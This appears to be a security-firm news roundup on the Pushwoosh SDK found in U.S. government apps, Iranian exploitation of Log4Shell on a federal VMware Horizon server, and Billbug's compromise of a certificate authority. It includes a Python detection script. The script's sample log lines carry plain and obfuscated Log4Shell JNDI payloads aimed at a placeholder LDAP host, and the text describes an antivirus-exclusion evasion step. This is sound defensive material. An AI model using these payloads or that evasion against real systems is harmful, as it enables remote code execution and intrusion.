Over the last week there have been several major stories in the international security community involving Russia, Iran and China: code from a Russian company was discovered in U.S. Army and CDC applications; Iranian hackers used Log4Shell to compromise a U.S. Federal agency; and the China-based APT group Billbug compromised a Certificate Authority (CA) as part of an espionage campaign. Check out each story below for more detail.
Russian Company Pushwoosh Code Found in U.S. Army & CDC Applications
Pushwoosh, a company that offers data processing for mobile applications, has been presenting itself as a U.S. organization based in Washington, D.C. and Maryland. Reuters has reported that Pushwoosh is in fact a Russian company headquartered in Novosibirsk, Siberia. Because it is registered in Russia and pays taxes there, it must comply with Russian law, which would require it to hand over data if the Russian government requested it. Pushwoosh code was embedded in a U.S. Army application used as an information portal for the National Training Center; the code was removed earlier this year, with “security issues” given as the reason. The CDC was using Pushwoosh code in several public-facing applications and has since removed it. Beyond the Army and the CDC, Pushwoosh code is used in more than 8,000 applications in the iOS App Store and the Google Play store, including apps from UEFA, Deloitte, Coca-Cola, McDonald’s and Unilever. Max Konev, the founder of Pushwoosh, claims his company “has no connection with the Russian government of any kind” and that all data is stored in either the U.S. or Germany. No evidence has been brought forward that Pushwoosh has shared data with the Russian government, but that does not mean it has not or could not in the future. The practical takeaway for defenders is a supply-chain one: keep an inventory of the third-party SDKs compiled into your own applications, who operates them, and where the data they collect is sent.
Iranian Hackers Used Log4Shell to Compromise a U.S. Federal Agency
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has attributed to an Iranian government-sponsored group the compromise of an unpatched VMware Horizon server owned by a U.S. Federal agency through the Log4Shell vulnerability (CVE-2021-44228). CISA responded to the incident over the summer and found cryptocurrency-mining software installed on the server; it believes the initial compromise happened in February 2022. After gaining access, the attackers pivoted through the network, compromised credentials and reached the domain controllers (DC), then installed reverse proxies to maintain persistent access. They also added an exclusion to Windows Defender that allowlisted the entire C:\ drive, which let them download PowerShell scripts and tools such as PsExec and Mimikatz to disk without being scanned and use them to further the attack. Additionally, the attackers changed the password for a local administrator account.
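The chain CISA describes, a JNDI lookup in a request to the Horizon server followed by a Defender exclusion covering the whole C:\ drive, leaves log evidence a defender can hunt for. The Python below is an added example, not code from nGuard or from CISA's advisory: it normalizes the common nested-lookup and URL-encoding obfuscations of Log4Shell payloads before matching, and flags Defender configuration-change events (Event ID 5007) whose newly added exclusion path is a drive root or another overly broad location. The access-log lines and event records are constructed for illustration; the 5007 message layout assumed here is the one Defender writes to the Windows event log, but check how your SIEM renders it before deploying the regex.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the obfuscation is stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_lookup(body):
    """Evaluate one inner Log4j lookup the way the attacker relies on it resolving.

    ${x:-default} -> "default"  (default-value syntax, including ${::-j})
    ${lower:X}    -> "x"
    ${upper:x}    -> "X"
    anything else -> left untouched
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    return "${" + body + "}"


def normalize_payload(text):
    """URL-decode (twice, to cover double encoding) and collapse nested lookups."""
    text = unquote(unquote(text))
    for _ in range(20):  # real payloads nest only a few levels; bound the loop anyway
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            if body.lstrip().lower().startswith("jndi:"):
                return m.group(0)  # keep the outer jndi lookup intact for the matcher
            out = _resolve_lookup(body)
            if out != m.group(0):
                changed = True
            return out

        text = _INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell_payloads(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_payload(line)
        if _JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Event ID 5007 = "Microsoft Defender Antivirus Configuration has changed".
# Assumed message layout for a newly added path exclusion:
#   New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\<path> = 0x0
_EXCLUSION_ADDED = re.compile(
    r"New value:\s*HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\(.+?)\s*=\s*0x0",
    re.IGNORECASE,
)
# Drive root, bare wildcard, or a top-level system directory: far too broad for an exclusion.
_BROAD_PATH = re.compile(
    r"^(?:[a-z]:\\?|\*+|[a-z]:\\(?:windows|users|programdata|program files(?: \(x86\))?)\\?)$",
    re.IGNORECASE,
)


def find_broad_defender_exclusions(events):
    """Return (time, path) for 5007 events that add an overly broad path exclusion."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5007:
            continue
        m = _EXCLUSION_ADDED.search(ev.get("Message", ""))
        if m and _BROAD_PATH.match(m.group(1).strip()):
            findings.append((ev["TimeCreated"], m.group(1).strip()))
    return findings


# Constructed sample data (not real logs): access-log lines from a Horizon front end,
# then Defender events as a SIEM might hand them to a script.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Feb/2022:03:14:07 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Feb/2022:03:15:22 +0000] "GET /portal/ HTTP/1.1" 200 12 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Feb/2022:03:15:23 +0000] "GET /portal/ HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Feb/2022:03:15:24 +0000] "GET /portal/?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]
SAMPLE_DEFENDER_EVENTS = [
    {"TimeCreated": "2022-02-11T02:10:41Z", "EventID": 5007,
     "Message": r"Microsoft Defender Antivirus Configuration has changed. Old value:  "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = 0x0"},
    {"TimeCreated": "2022-02-11T02:12:05Z", "EventID": 5007,
     "Message": r"Microsoft Defender Antivirus Configuration has changed. Old value:  "
                r"New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Build\agent = 0x0"},
    {"TimeCreated": "2022-02-11T02:13:00Z", "EventID": 5001,
     "Message": "Microsoft Defender Antivirus Real-time Protection is disabled."},
]

if __name__ == "__main__":
    for n, norm in find_log4shell_payloads(SAMPLE_ACCESS_LOG):
        print(f"log4shell payload on line {n}: {norm}")
    for when, path in find_broad_defender_exclusions(SAMPLE_DEFENDER_EVENTS):
        print(f"broad Defender exclusion added at {when}: {path}")
```

Only three of the four sample lines are flagged, and only one of the two exclusion events; the `C:\Build\agent` exclusion is narrow enough to be a normal administrative change, which is the distinction that keeps this rule from paging on every build server. Run the same two functions over your own Horizon access logs and a Defender 5007 export to retro-hunt the February-to-summer window CISA describes.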
nGuard detailed the Log4Shell vulnerability back in January. If you feel Log4Shell may still be an issue within your organization, nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.
Billbug, a China-Based APT, Compromised a Certificate Authority
Billbug, a state-sponsored APT group, compromised an unnamed Certificate Authority as part of an espionage campaign. The concern is clear: an attacker who can obtain or issue certificates from a trusted CA could sign their own malware so it passes code-signing checks, or obtain certificates for victim domains and, given a position on the network path, intercept and decrypt HTTPS traffic. The Symantec Threat Hunting team made the discovery and reported it to the affected Certificate Authority. At this time there is no evidence or indication that Billbug was able to compromise or gain access to any digital certificates.